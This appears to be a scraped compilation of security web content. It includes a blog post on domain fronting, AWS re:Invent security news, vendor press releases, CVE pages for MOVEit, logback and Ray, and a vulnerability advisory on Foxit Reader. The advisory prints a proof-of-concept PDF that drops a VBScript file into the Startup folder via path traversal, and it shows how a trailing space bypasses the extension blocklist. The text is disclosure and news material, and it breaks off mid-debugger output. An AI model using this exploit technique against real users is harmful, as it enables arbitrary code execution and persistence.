Domain fronting is a technique to hide the true origin of HTTPS requests by hiding the real domain name encrypted inside a legitimate TLS request.

Domain fronting is a technique of using different domain names on the same HTTPS connection. Put simply, domain fronting hides your traffic when connecting to a specific website. It routes traffic through a larger platform, masking the true destination in the process.

The technique became popular in the early 2010s in the mobile app development ecosystem, where developers would configure their apps to connect to a “front” domain that would then forward the connections to the developer’s backend. This way, the developer could expand their backend to deal with growing traffic and new features without constantly having to release app updates.

But as is true or many good things, it also comes with a flipside. Domain fronting allows malicious actors to use legitimate or high-reputation domains which will typically be on the allow-lists of defenders. The legitimate domains often belong to Content Delivery Networks (CDNs), but in recent years a number of large CDNs have blocked the method. The list includes Amazon (banned in 2018), Google (2018),  Microsoft (2022), and Cloudflare (2015).

A CDN is basically a large network of proxy servers and data centers and it can be used to host multiple domains. They are also known as content distribution networks. It’s what companies like Netflix use to deliver the requested content from a server near you.

For a “normal” connection to a website, a Domian Name System (DNS) finds the IP address for the requested domain name. As I explained in the blog DNS hijacks: what to look for, DNS is the phonebook of the internet to the effect that the input is a name and the output is a number. The number that belongs to what or who you want to reach.

With two domains hosted on the same CDN, HTTPS can be used to make it seem as though the user is connecting via a website that is unrestricted. HTTPS protocols are encrypted, so it can be used to discreetly connect to a different target domain. So an attacker can hide an HTTPS request to a restricted site inside a TLS connection to an allowed site.

In domain fronting, the process is the same but it will make an HTTPS request that appears to be from a different domain. It does so by mimicking the secondary domain’s DNS and TLS requests which makes it seem as though the user has connected from another domain. This method is popular as a means to evade online censorship and bypass restrictions.

The technique was adopted by online services like Tor, Telegram, and Signal to bypass internet censorship attempts in oppressive countries. When both Amazon and Google blocked domain fronting on their platforms, some suspected the Russian government was behind it because at the time, the Russian government blocked 1.8 million AWS and Google Cloud IP addresses in an attempt to frustrate access to Telegram’s instant messenger.

Because of the ability to hide backend infrastructure, domain fronting has also gained popularity within malware operations. They can use domain fronting to set up a command and control (C2) channel on a seemingly legitimate domain to bypass defensive techniques. The owners of good reputation sites cannot prevent their hostnames being abused for this activity.

The best defense against domain fronting in an enterprise organization is a cloud-based SWG (Secure Web Gateway) service with unlimited TLS interception capacity. A secure web gateway (SWG) is a network security technology that sits between users and the internet to filter traffic and enforce acceptable use and security policies. With an SWG or other tools with similar functionality, you can detect mismatches between the TLS Server Name Indication (SNI) and the HTTPS host header, and get a warning about domain fronting.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Explained: Domain fronting 

Amazon Web Services announced enhancements to several of its security tools, including GuardDuty, Inspector, Detective, IAM Access Analyzer, and Secrets Manager, to name a few during its re:Invent event.

Source: Techa Tungateja via Alamy Stock Photo

Amazon Web Services has been unveiling a steady stream of announcements during its AWS re:Invent 2023 event in Las Vegas this week. As expected, the focus over the four days has been on artificial intelligence (AI) as AWS strives to show that its offerings can match – or surpass – those from Google Cloud and Microsoft Azure. But even beyond generative AI, AWS is highlighting enhancements to its threat detection, vulnerability assessment, and security policy tools.

First up: AWS has expanded Amazon GuardDuty with Amazon GuardDuty EC2 Runtime Monitoring and Amazon GuardDuty ECS Runtime Monitoring. GuardDuty EC2 Runtime Monitoring, now in preview, introduces runtime threat detection for Amazon Elastic Compute Cloud workloads to give security teams visibility into on-host, operating system-level activities. It also provides container-level context into threats. Amazon GuardDuty ECS Runtime Monitoring uses a lightweight security agent to extend threat detection for workloads running on EC2 and AWS Fargate.

AWS Secrets Manager now supports a single API call to identify and retrieve a group of secrets associated with the application. The BatchGetSecretValue API simplifies developer workflows. And administrators can now enter their own customer-specific security controls in AWS Security Hub to customize security posture monitoring.

**Generative AI to Security**

AWS is adding generative AI to its security tools Amazon Inspector and Amazon Detective. Amazon Inspector, a code-scanning tool for AWS Lambda functions, offers assisted code remediation using generative AI and automated reasoning and can provide in-context code patches for multiple vulnerability classes. Amazon Detective helps security investigations by using generative AI to analyze multiple activities related to potential security events and find group summaries.

Additionally, Amazon Inspector has agentless vulnerability scanning for Amazon Elastic Cloud Compute instances in preview. Amazon Detective now supports log retrieval from Amazon Security Lake and investigating AWS identity and access management entities for indicators of compromise.

**Identity and Access Announcements**

The AWS Identity and Access Manager (IAM) Access Analyzer continuously analyzes user accounts to identify unused access privileges and permissions to help administrators implement the principle of least privilege. Security teams can review the findings to prioritize which accounts need action. The tool also provides custom policy checks to validate that IAM policies adhere to the organization's security standards before systems are deployed.

Amazon EKS Pod Identity allows administrators to define required IAM permissions for applications in Amazon Elastic Kubernetes Service clusters. This allows the applications to connect with AWS services outside of the cluster.

Finally, AWS announced support for mutually authenticating clients presenting X509 certificates to Application Load Balancer. This helps administrators offload client authentication to the load balancer to ensure only trusted clients are able to access the organization's cloud applications.

**About the Author(s)**

Rundown of Security News From AWS re:Invent 2023

PRESS RELEASE

HERZLIYA, Israel, Nov. 29, 2023 /PRNewswire/ -- XM Cyber, the leader in hybrid cloud exposure management, today announced new capabilities that provide complete and continuous visibility into risks and vulnerabilities in Kubernetes environments. Kubernetes Exposure Management helps security teams protect critical assets running in Kubernetes clusters across public cloud, private cloud, and on-premises infrastructure.

The new solution delivers continuous visibility into vulnerabilities, risky permissions, and misconfigurations that could allow attackers to breach Kubernetes environments and access valuable data and applications. By extending XM Cyber's industry-leading XM Attack Graph Analysis™ to Kubernetes, organizations can now see integrated risks across hybrid environments and intelligently prioritize remediation based on potential impact to critical assets.

"We are early adopters of XM Cyber's new Kubernetes features in order to achieve full transparency into our customer environments", said Moritz Tuerk, Chief Product Owner Security for SAP Product Engineering. "With the comprehensive attack path view, we can enhance the security of the SAP cloud even further than what is currently possible."

Key benefits of XM Cyber's Kubernetes Exposure Management include:

*   360-Degree Visibility: Gain a comprehensive view of risks and excessive permissions across all Kubernetes assets.
    
*   Protection for Sensitive Resources: Ensure the security of vital Kubernetes resources like ConfigMaps and Secrets.
    
*   Cross-Environment Analysis that reduces remediation efforts: Perform multi-step attack modeling, risk assessment, and prioritization that considers the needs of multiple domains.
    
*   Rapid Time-to-Value: Initial deployment can be completed in hours to unlock actionable exposure insights from day one.
    

Security issues have caused 67% of companies to delay or slow down Kubernetes deployment. XM Cyber's Kubernetes Exposure Management capabilities are aimed at helping security teams tackle this emerging risk vector head-on.

"Kubernetes adoption is accelerating, but securing these highly complex environments remains a huge challenge," said Boaz Gorodissky, CTO at XM Cyber. "Our new Kubernetes Exposure Management equips security teams with the comprehensive visibility and automated control they urgently need to reduce attack surfaces and proactively protect critical container workloads."

To learn more about XM Cyber, please visit: https://xmcyber.com/solution-briefs/kubernetes-continuous-exposure-management/.

About XM Cyber

XM Cyber is a leading hybrid cloud exposure management company that's changing the way organizations approach cyber risk. XM Cyber transforms exposure management by demonstrating how attackers leverage and combine misconfigurations, vulnerabilities, identity exposures, and more, across AWS, Azure, GCP, and on-prem environments to compromise critical assets. With XM Cyber, you can see all the ways attackers might advance, and all the best ways to stop them, pinpointing where to remediate exposures with a fraction of the effort. Founded by top executives from the Israeli cyber intelligence community, XM Cyber has offices in North America, Europe, Asia Pacific and Israel.

You May Also Like

XM Cyber Launches Kubernetes Exposure Management to Intelligently Protect Critical Container Environments

PRESS RELEASE

SANTA CLARA, Calif., Nov. 27, 2023 — Fortanix® Inc., a leader in data security and pioneer of Confidential Computing, today announced Key Insight, a new industry-first capability in the Fortanix Data Security Manager TM (DSM) platform designed to help enterprises discover, assess, and remediate risk and compliance gaps across hybrid multicloud environments. At AWS re:Invent 2023, Fortanix will showcase the capabilities of Key Insight at booth #118.  
Data breaches lead to massive monetary losses, hefty penalties and severe brand damage. While traditional firewall and cloud security defenses shield the perimeter, the data itself remains vulnerable. Encryption is the final line of defense, but enterprises lack robust control over encryption keys, leading to significant risk. Enterprises need to fortify security beyond just its perimeter layers and are driving the paradigm shift towards a rigorous, data-centric security model with complete visibility and control over its encryption assets.  
According to a Gartner® report, “It is critical to understand if access to data and encryption keys by the CSP, by internal staff, or if the data residency locations across CSP platforms will create business impacts due to security or compliance risks.”  
Fortanix Key Insight is the first and only solution to provide consolidated insights and control of all cryptographic keys to protect critical data services. Security, cloud and developer teams can collaborate to assess risk posture and remediate compliance gaps consistent with policies, regulatory mandates, or industry standards (e.g., NIST, GDPR, PCI, etc.). Key Insight expands the power of Fortanix DSM, a unified data security platform for enterprise key management, data tokenization, secrets management, and more.   
“Key Insight provides a unique combination of discovery, assessment and remediation of encryption keys and cloud data services in one Enterprise Key Posture Management (EKPM) solution, helping enterprises prevent data breaches and failed regulatory audits,” said Anand Kashyap, co-founder and CEO at Fortanix. “Key Insight is aligned with our value statement – ‘Look. Know. Further.,’ by allowing companies to look across siloed encryption environments, know their data security risk posture, and go further with complete control of their data, including remediation.”   
Fortanix Key Insight offers several innovations to enhance data security:

*   Discover all encryption assets and provide a detailed mapping between encryption keys and data services in an intuitive and easy-to-understand dashboard  
    
*   Assess data security risk posture through visual heatmaps that quickly pinpoint risks, gaps and priorities against established policies, regulations and industry standards
    
*   Remediate gaps in policy and compliance to eliminate risk to achieve crypto agility at scale, with robust reporting to demonstrate continuous improvements over time  
    

“As the global leader in AI-based advanced imaging for healthcare applications, Rapid AI is fully committed to security, compliance, processes and technologies to protect its platform and sensitive patient data, especially in the cloud,” said Amit Phadnis, CTO of Rapid AI. “In this endeavor, awareness and proper management and remediation, where necessary, of encryption keys is of prime importance. Any tool that helps ease our encryption keys posture management would be desirable for our security and compliance teams.”    
“Organizations can ill afford data breaches and non compliance of globally proliferating privacy regulations," said Craig Gledhill, CEO of ACA Pacific. "Data encryption is crucial for protecting data, but equally crucial is the ability to pinpoint blind spots and remediate risks and compliance gaps. It is in this regard that the introduction of Fortanix Key Insight can be of great help to our customers in their quest for multicloud data security and compliance."  
This latest addition to Fortanix DSM adds another industry first to the platform’s robust list of capabilities, which include enterprise key management, data masking/tokenization, secrets management, code signing, and confidential AI and confidential data search.

Announcing Fortanix Key Insight — A Solution to Discover and Remediate Data Security Risks in Hybrid Multicloud Environments


In Progress MOVEit Transfer versions released before 2022.0.9 (14.0.9), 2022.1.10 (14.1.10), 2023.0.7 (15.0.7), a privilege escalation path associated with group administrators has been identified.  It is possible for a group administrator to elevate a group members permissions to the role of an organization administrator.


MOVEit enables your organization to meet strict cybersecurity compliance standards such as PCI-DSS, HIPAA, GDPR, SOC2 and more. Provide a secure environment for your most sensitive files, while easily ensuring the reliability of core business processes.

30-day FREE trial. No credit card required.

Release

**MOVEit 2023.1: Check Out All the New Features in the Latest Release**

**MOVEit Modules**

MOVEit’s flexible architecture makes it easy to choose the exact capabilities that match your organization’s specific needs.

**MOVEit Transfer**

*   **On-premise** solution.
*   Ensure management and control over your business-critical file transfers by consolidating them all on one system.
*   Leverage MOVEit Transfer’s file encryption, security, activity tracking tamper-evident logging, and centralized access controls.
*   Reliably and easily comply with SLAs, internal governance requirements and regulations like PCI, HIPAA, CCPA/CPRA and GDPR.

Explore MOVEit Transfer Free Trial

**MOVEit Cloud**

*   MOVEit Transfer hosted by Progress **as-a-Service in the Cloud**.
*   All the benefits of managed file transfer without the heavy lifting.
*   Operational reliability with clear SLAs and internal governance.
*   Compliant with PCI, HIPAA, CCPA/CPRA and GDPR.

Explore MOVEit Cloud Free Trial

**MOVEit Automation**

*   Works with MOVEit Cloud, MOVEit Transfer, hybrid cloud endpoints (AWS S3, Azure Blob, SharePoint, etc.) or any FTP system.
*   **Provides advanced workflow automation capabilities without the need for scripting.**
*   Securely share sensitive files with full visibility into all file transfer activities, including a tamper-evident audit trail.

Explore MOVEit Automation Free Trial

**Additional Features**

Email and Web Transfer

MOVEit Ad-Hoc makes secure file transfer easily accessible from Microsoft Outlook or a web browser to assure the compliant ad-hoc transfers of sensitive data.

Secure End-User Collaboration

Secure Folder Sharing provides internal and external end users with an easy-to-use, drag-and-drop collaboration capability as an alternative to using email or content collaboration to share sensitive data.

Mobile Managed File Transfer

The free MOVEit Mobile app puts secure and managed file transfer control at your fingertips via your iOS or Android device.

Flexible Deployment

Deployment flexibility means you can meet your exact needs with options ranging from MFT-as-a-Service, to public cloud to on-premises or hybrid cloud solutions.

MOVEit Add-in for Microsoft Outlook

Provides an exceptional user experience that makes sharing secure files intuitive and hassle-free. Deploys centrally with nothing for users to install or maintain.

DMZ Proxy Gateway

MOVEit Gateway is a DMZ proxy server that keeps confidential/sensitive data, authentication, and access information behind the firewall.

**Industries**

**Banking & Finance**

Secure file sharing is the foundation for trust in financial transactions. Use MOVEit to help meet PCI-DSS, GDPR, and ISO 27001 compliance requirements.

Explore

**Government & Public Sector**

MOVEit helps IT teams at almost every federal civilian agency and military branch to securely transfer mission-critical information and assure the performance of their networked infrastructures and applications.

Explore

**Healthcare**

When lives are on the line, IT teams need to deliver virtually zero downtime and assure the secure and confidential movement of patient data.

Explore

**Insurance**

Pushing claims or processing payments, IT teams in a highly regulated industry like insurance need powerful tools that make their lives simpler.

Explore

**Manufacturing**

Gain operational efficiencies and eliminate manual errors while securely delivering important files to customers and partners.

Explore

**Education**

Ensure your school protects and shares personally identifiable information through encryption that protects sensitive files at rest and in transit.

Explore

**Request Pricing**

Get a free price quote from one of our experts.

**Additional Capabilities**

**Multi-Tenancy**

Our Multi-tenancy option enables MOVEit Transfer to simultaneously serve multiple client organizations, or “tenants”, on a domain or username basis.

Download Data Sheet

**High Availability**

MOVEit Transfer has a flexible architecture that can be deployed on one or more systems to address availability, performance or scalability requirements.

Download Data Sheet

**Desktop Clients**

Choose from a full range of desktop clients to meet your needs, including an easy-to-use MOVEit Client for Windows and MacOS, WS\_FTP, MOVEit EZ and MOVEit Freely

See Desktop Clients

**API**

The MOVEit API offers third-party programs access to a wide variety of MOVEit Cloud and MOVEit Transfer services and administrative capabilities.

Download Data Sheet

**MOVEit Architecture**

Any FTPS ServerAny SFTP ServerAny HTTPS ServerAny ASx Server Mainframe/Unix Server Network Share Any FTPS ServerAny SFTP Server Azure Blob AWS S3 Firewall Firewall Sharepoint Email ServerSMIME Email Server Email Server Internet DMZ Secure Network Web Browser Web Browser Microsoft Outlook Mobile Users Mobile Users Any FTPS ClientAny SFTP ClientAS2 or AS3 ClientOther MOVEit Clients Any FTPS ClientAny SFTP ClientOther MOVEit Clients FTPS, SFTP, HTTPS, ASx FTPS, SFTP, SMB FTPS, SFTP, HTTPS Secure Tunel HTTPS FTPS, SFTP, HTTPS, ASx Any FTPS ServerAny SFTP ServerAny HTTPS ServerAny ASx Server Sharepoint Email ServerSMIME Email Server Azure Blob AWS S3 Internet FTPS, SFTP, HTTPS, ASx DMZ Firewall Firewall Web Browser Mobile Users Any FTPS ClientAny SFTP ClientAS2 or AS3 ClientOther MOVEit Clients HTTPS Mainframe/Unix Server Network Share Any FTPS ServerAny SFTP Server Email Server SECURETUNEL Web Browser MicrosoftOutlook Mobile Users Any FTPS ClientAny SFTP ClientOther MOVEit Clients FTPS, SFTP, HTTPS FTPS, SFTP, SMB Secure Network

**Awards**

**MOVEit Earns Gold Medal in Latest Info-Tech Report**

MOVEit named industry leader in latest Info-Tech report on MFT vendors, placing first in quality and breadth of features.

Read the Report

**Related Resources**

**MOVEit Managed File Transfer FAQs**

**Start Your Free MOVEit Trial**

CVE-2023-6218: MOVEit Secure Managed File Transfer Software | Progress

A serialization vulnerability in logback receiver component part of 
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service 
attack by sending poisoned data.



CVE-2023-6378: News

Anyscale has dismissed the vulnerabilities as non-issues, according to researchers who reported the bugs to the company.

Source: Ken stocker via Shutterstock

Organizations using Ray, the open source framework for scaling artificial intelligence and machine learning workloads, are exposed to attacks via a trio of as yet unpatched vulnerabilities in the technology, researchers said this week.

**Potentially Heavy Damage**

The vulnerabilities give attackers a way to, among other things, gain operating system access to all nodes in a Ray cluster, enable remote code execution, and escalate privileges. The flaws present a threat to organizations that expose their Ray instances to the Internet or even a local network.

Researchers from Bishop Fox discovered the vulnerabilities and reported them to Anyscale — which sells a fully managed version of the technology — in August. Researchers from security vendor Protect AI also privately reported two of the same vulnerabilities to Anyscale previously.

But so far, Anyscale has not addressed the flaws, says Berenice Flores Garcia, senior security consultant at Bishop Fox. "Their position is that the vulnerabilities are irrelevant because Ray is not intended for use outside of a strictly controlled network environment and claims to have this stated in their documentation," Garcia says.

Anyscale did not immediately respond to a Dark Reading request for comment.

Ray is a technology that organizations can use to distribute the execution of complex, infrastructure-intensive AI and machine learning workloads. Many large organizations (including OpenAI, Spotify, Uber, Netflix, and Instacart) currently use the technology for building scalable new AI and machine learning applications. Amazon's AWS has integrated Ray into many of its cloud services and has positioned it as technology that organizations can use to accelerate the scaling of AI and ML apps.

**Easy to Find and Exploit**

The vulnerabilities that Bishop Fox reported to Anyscale pertain to improper authentication and input validation in Ray Dashboard, Ray Client, and potentially other components. The vulnerabilities affect Ray versions 2.6.3 and 2.8.0 and allow attackers a way to obtain any data, scripts, or files stored in a Ray cluster. "If the Ray framework is installed in the cloud (i.e., AWS), it is possible to retrieve highly privileged IAM credentials that allow privilege escalation," Bishop Fox said in its report.

The three vulnerabilities that Bishop Fox reported to Anyscale are CVE-2023-48023, a remote code execution (RCE) vulnerability tied to missing authentication for a critical function; CVE-2023-48022, a server-side request forgery vulnerability in the Ray Dashboard API that enables RCE; and CVE-2023-6021, an insecure input validation error that also enables a remote attacker to execute malicious code on an affected system.

Bishop Fox's report on the three vulnerabilities included details on how an attacker could potentially exploit the flaws to execute arbitrary code.

The vulnerabilities are easy to exploit, and attackers do not require a high level of technical skills to take advantage of them, Garcia says. "An attacker only requires remote access to the vulnerable component ports — ports 8265 and 10001 by default — from the Internet or from a local network," and some basic Python knowledge, she says.

"The vulnerable components are very easy to find if the Ray Dashboard UI is exposed. This is the gate to exploit the three vulnerabilities included in the advisory," she adds. According to Garcia, if the Ray Dashboard is not detected, a more specific fingerprint of the service ports would be required to identify the vulnerable ports. "Once the vulnerable components are identified, they are very easy to exploit following the steps from the advisory," Garcia says.

Bishop Fox's advisory shows how an attacker could exploit the vulnerabilities to obtain a private key and highly privileged credentials from an AWS cloud account where Ray is installed. But the flaws affect all organizations that expose the software to the Internet or local network.

**Controlled Network Environment**

Though Anycase did not respond to Dark Reading, the company's documentation states the need for organizations to deploy Ray clusters in a controlled network environment. "Ray expects to run in a safe network environment and to act upon trusted code," the documentation states. It mentions the need for organizations to ensure that network traffic between Ray components happens in an isolated environment and to have strict network controls and authentication mechanisms when accessing additional services.

"Ray faithfully executes code that is passed to it — Ray doesn’t differentiate between a tuning experiment, a rootkit install, or an S3 bucket inspection," the company noted. "Ray developers are responsible for building their applications with this understanding in mind."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Critical Vulns Found in Ray Open Source Framework for AI/ML Workloads

Anyscale Ray 2.6.3 and 2.8.0 allows /log_proxy SSRF. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment

CVE-2023-48023: Ray, Versions 2.6.3, 2.8.0

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to mistreatment of whitespace characters. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**SUMMARY**

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to mistreatment of whitespace characters. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

**PRODUCT URLS**

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-73 - External Control of File Name or Path

**DETAILS**

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists an arbitrary file creation vulnerability in the way Foxit Reader handles the exportDataObject method of the Doc object. The exportDataObject method extracts the data object specified via the cName parameter to an external file. This method can launch the file once it is created if the nLaunch parameter of the method is set to 2. This can be illustrated by the following proof-of-concept code:

    5 0 obj
    <</S/JavaScript/JS(\n\nfunction main {
    this.exportDataObject${ cName:"MyData", nLaunch: 2}$;
    
    }
    main;
    )/Type/Action>>
    endobj
    
    6 0 obj
    <</Length 6/Params<</ModDate(D:20230731134730-08'00')/Size 6/CheckSum<FA0903293EC8FC1F19087D0EB2FFDED8>/CreationDate(D:20230731133537-08'00')>>/Subtype/application#2Fhta/Type/EmbeddedFile>>
    stream
    <job>
      <script language="VBScript">
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c calc.exe"
      </script>
    </job>
    endstream
    endobj
    
    7 0 obj
    <</UF(..\/..\/..\/..\/..\/AppData\/Roaming\/Microsoft\/Windows\/Start Menu\/Programs\/Startup\/exploit.wsf )/EF<</F 6 0 R>>/Desc()/F(exploit.wsf)/Type/Filespec>>
    endobj
    
    8 0 obj
    <</EmbeddedFiles 9 0 R>>
    endobj
    
    9 0 obj
    <</Names[<FEFF004D00790044006100740061>7 0 R]>>
    endobj
    

Here, the object 9 contains the MyData data object. FEFF004D00790044006100740061 is the hexadecimal unicode value of the string MyData. The exportDataObject method extracts this data object and writes it to the file indicated by the UF key of the object 7. In this case, a WSF file is written to the disk. The content of the file is the stream object of the object 6, which contains the VBScript code to run the calc.exe application.

The Foxit application saves the new file to the temp directory, but it doesn’t check for the directory traversal characters, i.e. dot-dot-slash (“../”), before appending the filename indicated by the UF key to the temporary directory path. This allows the use of the directory traversal vulnerability to write files to an arbitrary path.

The application checks the extension of a file against the blocklist filter of 93 known file extensions before calling a method responsible for creating it. The blocklisted extensions are as follows:

    .text:017E47CD mov     [ebp+var_19C], offset aAcm ; "acm"
    .text:017E47D7 mov     [ebp+var_198], offset aAde ; "ade"
    .text:017E47E1 mov     [ebp+var_194], offset aAdp ; "adp"
    .text:017E47EB mov     [ebp+var_190], offset aApp ; "app"
    .text:017E47F5 mov     [ebp+var_18C], offset aAsa ; "asa"
    .text:017E47FF mov     [ebp+var_188], offset aAsp ; "asp"
    .text:017E4809 mov     [ebp+var_184], offset aAspx ; "aspx"
    .text:017E4813 mov     [ebp+var_180], offset aAx ; "ax"
    .text:017E481D mov     [ebp+var_17C], offset aBas ; "bas"
    .text:017E4827 mov     [ebp+var_178], offset aBat ; "bat"
    .text:017E4831 mov     [ebp+var_174], offset aBin ; "bin"
    .text:017E483B mov     [ebp+var_170], offset aCer ; "cer"
    .text:017E4845 mov     [ebp+var_16C], offset aChm_0 ; "chm"
    .text:017E484F mov     [ebp+var_168], offset aClb ; "clb"
    .text:017E4859 mov     [ebp+var_164], offset aCmd ; "cmd"
    .text:017E4863 mov     [ebp+var_160], offset aCnt ; "cnt"
    .text:017E486D mov     [ebp+var_15C], offset aCnv ; "cnv"
    .text:017E4877 mov     [ebp+var_158], offset aCom ; "com"
    .text:017E4881 mov     [ebp+var_154], offset aCpl ; "cpl"
    .text:017E488B mov     [ebp+var_150], offset aCpx ; "cpx"
    .text:017E4895 mov     [ebp+var_14C], offset aCrt ; "crt"
    .text:017E489F mov     [ebp+var_148], offset aCsh ; "csh"
    .text:017E48A9 mov     [ebp+var_144], offset Ext ; "dll"
    .text:017E48B3 mov     [ebp+var_140], offset aDrv ; "drv"
    .text:017E48BD mov     [ebp+var_13C], offset aDtd ; "dtd"
    .text:017E48C7 mov     [ebp+var_138], offset aExe_0 ; "exe"
    .text:017E48D1 mov     [ebp+var_134], offset aFxp ; "fxp"
    .text:017E48DB mov     [ebp+var_130], offset aGrp ; "grp"
    .text:017E48E5 mov     [ebp+var_12C], offset aH1s ; "h1s"
    .text:017E48EF mov     [ebp+var_128], offset aHlp ; "hlp"
    .text:017E48F9 mov     [ebp+var_124], offset aHta ; "hta "
    .text:017E4903 mov     [ebp+var_120], offset aIme ; "ime"
    .text:017E490D mov     [ebp+var_11C], offset aInf_0 ; "inf"
    .text:017E4917 mov     [ebp+var_118], offset aIns ; "ins"
    .text:017E4921 mov     [ebp+var_114], offset aIsp ; "isp"
    .text:017E492B mov     [ebp+var_110], offset aIts ; "its"
    .text:017E4935 mov     [ebp+var_10C], offset aJs_3 ; "js"
    .text:017E493F mov     [ebp+var_108], offset aJse ; "jse"
    .text:017E4949 mov     [ebp+var_104], offset aKsh ; "ksh"
    .text:017E4953 mov     [ebp+var_100], offset aLnk_0 ; "lnk"
    .text:017E495D mov     [ebp+var_FC], offset aMad ; "mad"
    .text:017E4967 mov     [ebp+var_F8], offset aMaf ; "maf"
    .text:017E4971 mov     [ebp+var_F4], offset aMag ; "mag"
    .text:017E497B mov     [ebp+var_F0], offset aMam ; "mam"
    .text:017E4985 mov     [ebp+var_EC], offset aMan ; "man"
    .text:017E498F mov     [ebp+var_E8], offset aMaq ; "maq"
    .text:017E4999 mov     [ebp+var_E4], offset aMar_0 ; "mar"
    .text:017E49A3 mov     [ebp+var_E0], offset aMas ; "mas"
    .text:017E49AD mov     [ebp+var_DC], offset aMat ; "mat"
    .text:017E49B7 mov     [ebp+var_D8], offset aMau ; "mau"
    .text:017E49C1 mov     [ebp+var_D4], offset aMav ; "mav"
    .text:017E49CB mov     [ebp+var_D0], offset aMaw ; "maw"
    .text:017E49D5 mov     [ebp+var_CC], offset aMda ; "mda"
    .text:017E49DF mov     [ebp+var_C8], offset aMdb ; "mdb"
    .text:017E49E9 mov     [ebp+var_C4], offset aMde ; "mde"
    .text:017E49F3 mov     [ebp+var_C0], offset aMdt ; "mdt"
    .text:017E49FD mov     [ebp+var_BC], offset aMdw ; "mdw"
    .text:017E4A07 mov     [ebp+var_B8], offset aMdz ; "mdz"
    .text:017E4A11 mov     [ebp+var_B4], offset aMsc ; "msc"
    .text:017E4A1B mov     [ebp+var_B0], offset aMsi ; "msi"
    .text:017E4A25 mov     [ebp+var_AC], offset aMsp ; "msp"
    .text:017E4A2F mov     [ebp+var_A8], offset aMst ; "mst"
    .text:017E4A39 mov     [ebp+var_A4], offset aMui ; "mui"
    .text:017E4A43 mov     [ebp+var_A0], offset aNls ; "nls"
    .text:017E4A4D mov     [ebp+var_9C], offset aOcx ; "ocx"
    .text:017E4A57 mov     [ebp+var_98], offset aOps ; "ops"
    .text:017E4A61 mov     [ebp+var_94], offset aPal ; "pal"
    .text:017E4A6B mov     [ebp+var_90], offset aPcd ; "pcd"
    .text:017E4A75 mov     [ebp+var_8C], offset aPif ; "pif"
    .text:017E4A7F mov     [ebp+var_88], offset aPrf ; "prf"
    .text:017E4A89 mov     [ebp+var_84], offset aPrg ; "prg"
    .text:017E4A93 mov     [ebp+var_80], offset aPst ; "pst"
    .text:017E4A9A mov     [ebp+var_7C], offset aReg_0 ; "reg"
    .text:017E4AA1 mov     [ebp+var_78], offset aScf ; "scf"
    .text:017E4AA8 lea     ecx, [ebp+var_1A4]
    .text:017E4AAE mov     [ebp+var_74], offset aScr ; "scr"
    .text:017E4AB5 mov     [ebp+var_70], offset aSct ; "sct"
    .text:017E4ABC mov     [ebp+var_6C], offset aShb ; "shb"
    .text:017E4AC3 mov     [ebp+var_68], offset aShs ; "shs"
    .text:017E4ACA mov     [ebp+var_64], offset aSys ; "sys"
    .text:017E4AD1 mov     [ebp+var_60], offset aTlb ; "tlb"
    .text:017E4AD8 mov     [ebp+var_5C], offset aTsp ; "tsp"
    .text:017E4ADF mov     [ebp+var_58], offset aUrl ; "url"
    .text:017E4AE6 mov     [ebp+var_54], offset aVb ; "vb"
    .text:017E4AED mov     [ebp+var_50], offset aVbe ; "vbe"
    .text:017E4AF4 mov     [ebp+var_4C], offset aVbs ; "vbs"
    .text:017E4AFB mov     [ebp+var_48], offset aVsmacros ; "vsmacros"
    .text:017E4B02 mov     [ebp+var_44], offset aVss ; "vss"
    .text:017E4B09 mov     [ebp+var_40], offset aVst ; "vst"
    .text:017E4B10 mov     [ebp+var_3C], offset aVsw ; "vsw"
    .text:017E4B17 mov     [ebp+var_38], offset aWs ; "ws"
    .text:017E4B1E mov     [ebp+var_34], offset aWsc ; "wsc"
    .text:017E4B25 mov     [ebp+var_30], offset aWsf ; "wsf"
    .text:017E4B2C mov     [ebp+var_2C], offset aWsh ; "wsh"
    .text:017E4B33 mov     [ebp+var_28], offset aXsl ; "xsl"
    

This check can be bypassed by adding a space at the end of the file. For example, “exploit.acm” will be blocked but the filename “exploit.acm “ will bypass the above checks and a file with the name exploit.acm will be created. We can observe the following in the debugger (here, the value of the UF key was (exploit.acm )):

    eax=0f8ec098 ebx=0e70e6e8 ecx=073fdb5c edx=0000005e esi=00000000 edi=0b04c54c
    eip=017e4ba5 esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad755:
    017e4ba5 6666660f1f840000000000 nop word ptr [eax+eax]
